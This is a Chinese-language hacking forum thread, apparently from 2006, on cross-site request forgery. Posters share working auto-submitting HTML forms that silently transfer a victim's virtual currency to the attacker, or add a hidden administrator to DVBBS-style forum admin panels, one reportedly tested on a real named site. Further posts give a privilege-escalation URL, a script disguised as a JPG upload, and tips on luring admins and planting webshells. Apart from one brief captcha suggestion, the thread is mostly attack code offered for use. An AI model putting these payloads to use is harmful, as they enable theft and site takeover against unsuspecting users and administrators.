[讨论]跨站的另类利用
议题提交:风蓝信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
以前从来没研究过什么跨站~甚至根本不清楚跨站攻击是什么~呵呵
今天看到一个跨站的动画~觉得很有趣~就是自己做一个别人站的添加管理员的页面,想办法让对方的管理员点击.
我就想这种方法估计很多程序都可以成功利用起来~关键就是要能想办法让对方执行你的页面地址~
这里我们不谈如何让别人点你的页面和如何添加用户了~
刚才在baidu上搜索游戏交易,突然想到~
那些游戏交易站如果用跨站来实现赠送对方积分或游戏币或道具等等可不可行?
下面都是假想,没有经过实践过的~
首先我们分析一下,跨站就是自己够造一个页面,想办法让别人打开,获取他的cookies进行cookie欺骗或是直接利用他的cookie进行我们指定的操作.
打个比方:
某网站[url]http://www.163.com[/url]是一个交易网站.
我自己的用户名:bwind 另外一个用户:flysky
该网站里有一种虚拟货币,类似QQB的那种.而这种货币是可以互相赠送给其他用户的.赠送的方法就是[url]http://www.163.com/visite.asp[/url]这个页面~
这个页面需要填写收货人的用户名,以及送出去货币的数字.我们把这些都记下来.查看该页面源文件,找到form表单提交地址,我们找到的是[url]http://www.163.com/visite.asp?action=to[/url]
现在我们就可以开始构造跨站脚本了.
在本机新建立一个a.htm的文件,内容如下:
--------------------------------
<form action="[url]http://www.163.com/visite.asp?action=to[/url]" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
<input type=text name="username2" size=30 value="bwind">收货人
<input type="password" name="password2" size=33 value="500">赠送数量
<input type="submit" name="Submit" value="赠送">
</table>
</form>
<script language="javascript">
this.document.forms[0].submit();
location.href('index.asp');
</script>
------------------------------
这段代码的意思就是直接post我们的内容到[url]http://www.163.com/visite.asp?action=to[/url]这个地址,如果别人正好登陆[url]www.163.com[/url]并保存了cookie了的话,他只要一打开我们构造的这个页面~他就会直接送给我(bwind) 500个货币.
不知道这东西以前有没有人写过~第一次研究跨站~给我的感觉就是危害太大了~根本不需要程序有什么漏洞,而是只要你会欺骗别人进入到你的页面.呵呵.
我自己想到的这种防范方法就是在一些重要数据提交的地方加上验证码~这样的话在怎么跨也没用了:)
再发个洞网加管理员的页面~自己测试成功了的~
--------------------------
<form action="[url]http://bbs.sasf.cn/admin/admin.asp?action=savenew[/url]" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
<tr>
<th colspan=2 height=23>管理员管理--添加管理员</th>
</tr>
<tr>
<td width="26%" align="right" class=forumrow>后台登录名称:</td>
<td width="74%" class=forumrow>
<input type=text name="username2" size=30 value=testkz> (可与注册名不同)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow >后台登录密码:</td>
<td width="74%" class=forumrow>
<input type="password" name="password2" size=33 value=testkz> (可与注册密码不同)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow height=23 >前台用户名称:</td>
<td width="74%" class=forumrow><input type=text name="username1" size=30 value=无影> (本选项填写后不允许修改)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow height=23>在前台显示为管理员:</td>
<td width="74%" class=forumrow>是<input name="isdisp" type=radio value="1" checked> 否<input name="isdisp" type=radio value="0"> (如改为显示请到用户管理中编辑资料)
</td>
</tr>
<tr align="center">
<td colspan="2" class=forumrow>
<input type="submit" name="Submit" value="添 加">
</td>
</tr>
</table>
</form>
<script language="javascript">
this.document.forms[0].submit();
location.href('index.asp');
</script>
-------------------------- 前段时间不是有个强行让别人送你Q币的文章吗,名字大概是这个,也是挂站的,原理和你的一样。 跨站 几年前都有人研究
有的bbs可以跨站 得到webshell [s:51] 重要的是思路`
学习一下` 恩上几次在X档案也是见过这么一篇文章,现在这样的跨站漏洞相关的资料实在太少了!我实验了好几次都不成功郁闷鸟~~~ <script language="javascript">
this.document.forms[0].submit();
location.href('index.asp');
</script> 加管理员的代码
<form action="[url]http://127.0.0.1/Admin/admin.asp?action=savenew[/url]" method=post name=h>
<input type=hidden name="username2" value=fhod>
<input type=hidden name="password2" value=123456>
<input type=hidden name="username1" value=fhod>
</form>
<script language=JavaScript>
document.h.submit();
</script>
这样就足够了..
这些在我那个动网刷分的漏洞里提起过
可以看一下
[url]http://www.eviloctal.com/forum/read.php?tid=17194&fpage=1[/url]
而且我也有想过来做个表单.让管理员或版主去点..达到普通用户刷分的目的. 全部使用前提都是以对方管理员登陆到后台后放可成立
不过这样子的方法也很爽的喔,小小的CSS可以用来守株待兔 但是这样加的管理是没后台权限的.
我们进后台无非就是要备份数据库得webshell
我用上面代码..在管理员登陆后台时,运行那个页面.成功添加管理员..并用帐号登陆时.发现是无权限的
经过本地给此用户加权限.并抓包..的信息..构造
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
这样的URL/..是给ID为3的管理员加上..数据处理的所有权限
提交后返回信息
成功信息
管理员更新成功,请记住更新信息。
而如果要把后台所有的权限都加上..就是
flag=1&flag=2&flag=3&flag=4&flag=5&flag=6&flag=7&flag=8&flag=9&flag=10&flag=11&flag=12&flag=13&flag=14&flag=15&flag=16&flag=17&flag=18&flag=19&flag=20&flag=21&flag=22&flag=23&flag=24&flag=25&flag=26&flag=27&flag=28&flag=29&flag=30&flag=31&flag=32&flag=33&flag=34&flag=35&flag=36&flag=37&id=3&Submit=%B8%FC%D0%C2&chkall=on
替换就可以了.
不用表单.直接提交就可以.但前提是管理员登陆了后台. [quote][b]下面是引用fhod于2006-01-03 13:11发表的:[/b]
但是这样加的管理是没后台权限的.
我们进后台无非就是要备份数据库得webshell
我用上面代码..在管理员登陆后台时,运行那个页面.成功添加管理员..并用帐号登陆时.发现是无权限的
经过本地给此用户加权限.并抓包..的信息..构造
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
.......[/quote]
跨站的语句太长了,应该不能够实现.而且没有这样子的跨站处可以用来跨站,建议把跨站的语句缩小几个部分进行提交. [quote][b]下面是引用hack_ben于2006-01-02 08:13发表的:[/b]
恩上几次在X档案也是见过这么一篇文章,现在这样的跨站漏洞相关的资料实在太少了!我实验了好几次都不成功郁闷鸟~~~[/quote]
此人名字与我相似,难道是失散多年的白痴兄弟? [quote][b]下面是引用h4k_b4n[BCT]于2006-01-03 13:33发表的:[/b]
跨站的语句太长了,应该不能够实现.而且没有这样子的跨站处可以用来跨站,建议把跨站的语句缩小几个部分进行提交.[/quote]
这个语句不是跨站的.
我是说.在加过管理员之后.上面的代码是给予管理员权限的.
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
可以欺骗管理员去点
或者是写入一个JPG图片里
然后把图片上传论坛..欺骗管理员..不是动网的那个.图片的.可以执行代码么
所以.应该是可以实现的.
我本地测试是成功了的. [quote][b]下面是引用fhod于2006-01-03 13:45发表的:[/b]
这个语句不是跨站的.
我是说.在加过管理员之后.上面的代码是给予管理员权限的.
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
.......[/quote]
欺骗管理员比起用来跨站还要困难了点! 真不知道说什么好点.我发现现在开始研究起跨站来了.我也说句:"Fhod.你的那个跨站语句太长了.不可能实现的!还有就是用跨站来欺骗管理员的现在也是很难实现!因为现在大多的站点的管理员对自己的站点安全性也是很注重的!如果他无意中打开了一个摸名的页面相信也会很小心的去检查一下!所以我们这样来欺骗很容易被发现的! [quote][b]下面是引用netsnow于2006-01-03 14:42发表的:[/b]
真不知道说什么好点.我发现现在开始研究起跨站来了.我也说句:"Fhod.你的那个跨站语句太长了.不可能实现的!还有就是用跨站来欺骗管理员的现在也是很难实现!因为现在大多的站点的管理员对自己的站点安全性也是很注重的!如果他无意中打开了一个摸名的页面相信也会很小心的去检查一下!所以我们这样来欺骗很容易被发现的![/quote]
跨站语句太长?免费虚拟二级域名……或者自己构建一个页面document.location跳
无意打开页面?iframe or img 不知道是不是误解了我意思呢.
h4k_b4n[BCT]
和netsnow说的我跨站语句长是不是指
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
这一句呢?
我个URL是我在给新加的管理员加权限时.抓包构造出来的URL
我们可以新建一个TXT文档写入以下代码..然后改后缀为jpg的.上传到论坛..但也就如netsnow所说.利用不大..我想还是可以更隐蔽的.
<script>window.open("[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]");</script> [quote][b]下面是引用fhod于2006-01-05 00:23发表的:[/b]
不知道是不是误解了我意思呢.
h4k_b4n[BCT]
和netsnow说的我跨站语句长是不是指
[url]http://127.0.0.1/Admin/admin.asp?action=updat&flag=31&flag=32&flag=33&flag=34&id=3&Submit=%B8%FC%D0%C2[/url]
这一句呢?
.......[/quote]
基于DVBBS,并不是单凭上传TXT或者JPG就OK的!因为有些设置会限制,而且未必导致管理员会访问.
我没有误解你的意思.是你误解我的^_^
你这个方法虽然是好,但是不够直接.如果可以嵌入到签名档就命中率高很多.但是因为你的语句太长了,导致无法嵌入 *** 作者被禁止或删除 内容自动屏蔽 *** *** 作者被禁止或删除 内容自动屏蔽 *** *** 作者被禁止或删除 内容自动屏蔽 *** 这样的代码我教程发的不要了!呵呵 [s:42] 我想的更多~ [s:75]
<form action="[url]http://www.163.com/visite.asp?action=to[/url]"><input name="username2" value="bwind">0<input name="password2" value="500">0<input type="submit" value="S"></table></form><script>this.document.forms[0].submit();location.href('index.asp');</script>
不知道这样的表单是不是更为简练呢? 学习[s:263][s:263][s:263] 跨站漏洞相关的资料实在太少了!我实验了好几次都不成功 [s:266] 传一张图。当然是你的小马
用cookie限制下次数,比如2次就行了。否则一直弹框
接着嘛。
databackup=save
[s:269] 是管理员帮忙给备份的小马。
茄子宝那篇xss文章被加精华的丢哪去了。
我找不到了,非常经典的说!
一瞬间的事。再一瞬间,网站沦陷,再一瞬间……
页:
[1]